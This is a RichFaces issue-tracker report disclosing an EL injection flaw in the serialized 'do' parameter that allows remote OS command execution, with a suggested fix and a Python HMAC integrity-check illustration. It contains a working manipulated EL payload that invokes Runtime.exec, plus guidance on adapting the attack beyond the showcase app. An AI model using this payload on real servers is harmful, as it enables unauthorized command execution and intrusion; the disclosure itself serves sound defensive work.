RichFaces issue RF-13977

Remote Command Injection (EL Injection)

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Critical
    • Resolution: Done
    • Affects Version/s: 4.5.2
    • Fix Version/s: 4.5.4
    • Component/s: component-a4j-core
    • Labels: None
    • Environment (reporter's test environment): Windows 7, Tomcat 7.0.47, Java 1.7.0_25
    • Security Sensitive Issue: This issue is security relevant

    Description

      Remote attackers can inject EL (Expression Language) via the "do" parameter.
      This leads to a remote Java method execution vulnerability.

      I used the showcase application (v4.5.2, a4j:mediaOutput) to confirm the bug.

      Normal URL path: /richfaces-showcase/rfRes/org.richfaces.resource.MediaOutputResource.jsf?do=eAFtUz1oFEEUflk50CRC1PiHBM4IQcHMEgNBOAMSfw8upjh!Y-Pc7nNvj9mdycxcbjEqNjYiKNgGLGy1shLS2AqxCFqlshILReyMjW!2Yn4Wp9jdGd73vW--9-3r71Bqa9h3u9bi85wJnkZsptHCwFaef7z5csCcEB5ApgCgZDTs2ayaklIgT5fL-tHnxbUfHvTMQmmeizZStYXeOOER-i2FEeFGHC5jd3mAhgUyUTLF1LK65RYvSxGirvN51Lc-vJ18sbg87YFXg12B4MZc4Qla2JvL8508v251nEaVGvQawoQ5h4UD3YpY-nXUMRfxPd4QWMmUovbHpY6YjoNmV0CIiWQJhjGfaVvVtmzafZ!nltM13erxYEcV-gIppK6mIWZj23antu3Gc3dyGD08MwcPoeS6jtJFmWmn69d2vQVaw1CwqzyaRtuU4YVMaTQmlqkjoNXTT3ZrONw1jEqLdXO1g32zz778dGOhwW3UbTK9evyk!mt25Uw-OGe-u32rIY1hHRSh63-D3kXixtD7T2sj!WWaZA12hqQ1oulYOJI7m!ko!CKkQgrGCuxtGwvX4qLUHa5DGlURtfpu!5!lp0tLTp8zazdpHHYsXPGgiQ5chFQTJaq!-aoYu3!UGZTDOodg8NhCPscpSiJTWlK8zAOAYqLXI!Nm5frXb0MLl!4l2rMwmAc6lqybBCpEnlgYyI-3!A1KZZ0G3PE3QuRvyY9vOOlD48dJdM1Q7Ee7Byxr2kSUz45PnJw4XQ6I2uI5mVqK!uTw!5QPZ-ovlY47BQ__

      The "do" parameter's value is encoded serialized object data.
      The decoded data is shown below.

      %AC%ED%00%05ur%00%13[Ljava.lang.Object;%90%CEX%9F%10s)l%02%00%00xp%00%00%00%05sr%00%11java.lang.Boolean%CD%20r%80%D5%9C%FA%EE%02%00%01Z%00%05valuexp%00t%00%0Aimage/jpegsr%00&javax.faces.component.StateHolderSaverY%CA%B3=%93%9C%CDM%02%00%02L%00%09classNamet%00%12Ljava/lang/String;L%00%0AsavedStatet%00%16Ljava/io/Serializable;xppsr%00(org.richfaces.demo.mediaOutput.MediaData%00%00%00%00%00%00%00%01%02%00%03I%00%0BcolorIndex1I%00%0BcolorIndex2I%00%0BcolorIndex3xp%00%00%00%00%00%00%00%01%00%00%00%02sq%00~%00%05psr%00-com.sun.faces.facelets.el.TagMethodExpression%00%00%00%00%00%00%00%01%0C%00%00xr%00%19javax.el.MethodExpressionqL%17%0BZ%8F%E1%F0%02%00%00xr%00%13javax.el.Expression%A3%85%8AS%F2Z%D2<%02%00%00xpsr%00&org.jboss.weld.el.WeldMethodExpressionb%1D%C1%D4%FA&%0C%20%02%00%01L%00%08delegatet%00%1BLjavax/el/MethodExpression;xr%001org.jboss.weld.util.el.ForwardingMethodExpression%DB%B9%15%FB%CD%8C%BC%BC%02%00%00xq%00~%00%0Dsr%00"org.apache.el.MethodExpressionImplI%F9a%DBl1|!%0C%00%00xq%00~%00%0Dw%18%00%14#{mediaBean.process}%00%00ur%00%13[Ljava.lang.String;%AD%D2V%E7%E9%1D{G%02%00%00xp%00%00%00%02t%00%14java.io.OutputStreamt%00%10java.lang.Objectppxwb%00`/richfaces/mediaOutput/samples/imgUsage-sample.xhtml%20@36,68%20createContent="#{mediaBean.process}"xp
      (unprintable chars are percent-encoded)

      As you can see, the data contains EL, which will be parsed and executed by RichFaces on the server.

      Obviously you can manipulate the EL in the data, as there is no integrity check by default.

      Normal: %18%00%14#{mediaBean.process}%00%00
      Manipulated: %88%00%84#{request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("ping -n 2 8.8.8.8")}%00%00

      With the manipulated value above, you can execute an OS command (the ping command) on the target server.

      For your convenience, I provide two attack URL examples:

      1. Exec "ping -n 2 8.8.8.8" on the target (for Windows)

      2. Exec "touch /tmp/foobar" on the target (for Linux)

      I guess this bug affects not only the showcase app but also any app using RichFaces, though I haven't tested on apps other than the showcase. To make it work on non-showcase apps, you probably need to replace the "org.richfaces.demo.mediaOutput.MediaData" instance in the serialized data with an instance of another class or NULL, because this (MediaData) class is specific to the showcase app.

      Fix suggestion: If you don't need to execute ELs supplied by clients, just ignore incoming ELs. If you need them to execute, a signature check may be needed to protect the data from manipulation. Note that the encryption mechanism (DES/ECB) in "org.ajax4jsf.util.base64.Codec" is, in general I think, considered insufficient to ensure data integrity.

      Note: I will report this issue to IPA (http://www.ipa.go.jp/index-e.html) which works with JPCERT/CC (Japanese CSIRT). Thus these organizations may contact you regarding this bug in a few months or so. They basically work to promote proper and responsible handling of vulnerability information.

      Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
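An added illustration of the integrity check the report suggests (example code, not RichFaces' own): the serialized state is authenticated with an HMAC-SHA256 tag that is verified in constant time before any deserialization or EL evaluation, so an edited EL string is rejected rather than parsed. The key, the stand-in state bytes and the function names are constructed for this example.

```python
import base64
import hashlib
import hmac
import os

TAG_LEN = hashlib.sha256().digest_size  # 32-byte HMAC-SHA256 tag

# Constructed server-side key for this example; a real deployment loads it
# from configuration and never exposes it to clients.
SERVER_KEY = os.urandom(32)


def sign_state(state: bytes, key: bytes = SERVER_KEY) -> str:
    """URL-safe token = HMAC-SHA256(key, state) || state.

    The tag covers the plaintext serialized state, so any edit to it
    (including the embedded EL string) invalidates the tag.
    """
    tag = hmac.new(key, state, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(tag + state).decode("ascii")


def verify_state(token: str, key: bytes = SERVER_KEY):
    """Return the state bytes only if the tag verifies, else None.

    Runs before the bytes reach any deserializer or EL evaluator, so
    unauthenticated input is never parsed at all.
    """
    try:
        raw = base64.urlsafe_b64decode(token.encode("ascii"))
    except (ValueError, UnicodeEncodeError):
        return None
    if len(raw) < TAG_LEN:
        return None
    tag, state = raw[:TAG_LEN], raw[TAG_LEN:]
    expected = hmac.new(key, state, hashlib.sha256).digest()
    # Constant-time comparison avoids leaking the tag through timing.
    return state if hmac.compare_digest(tag, expected) else None


# Constructed stand-in for the serialized MediaOutput state; the real
# value is Java serialization, but only the raw bytes matter here.
SAMPLE_STATE = b'image/jpeg\x00createContent="#{mediaBean.process}"'


def edit_token(token: str, old: bytes, new: bytes) -> str:
    """Model a client editing the EL inside an existing token."""
    raw = base64.urlsafe_b64decode(token.encode("ascii"))
    return base64.urlsafe_b64encode(raw.replace(old, new)).decode("ascii")
```

Unlike an unauthenticated DES/ECB blob, the tag binds the whole state to the server key, so a client cannot substitute a different EL expression without the server rejecting the token outright.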

    People

    • Assignee: michpetrov (Michal Petrov)
    • Reporter: terada.takeshi (Takeshi Terada)
    • Involved: Matej Novotny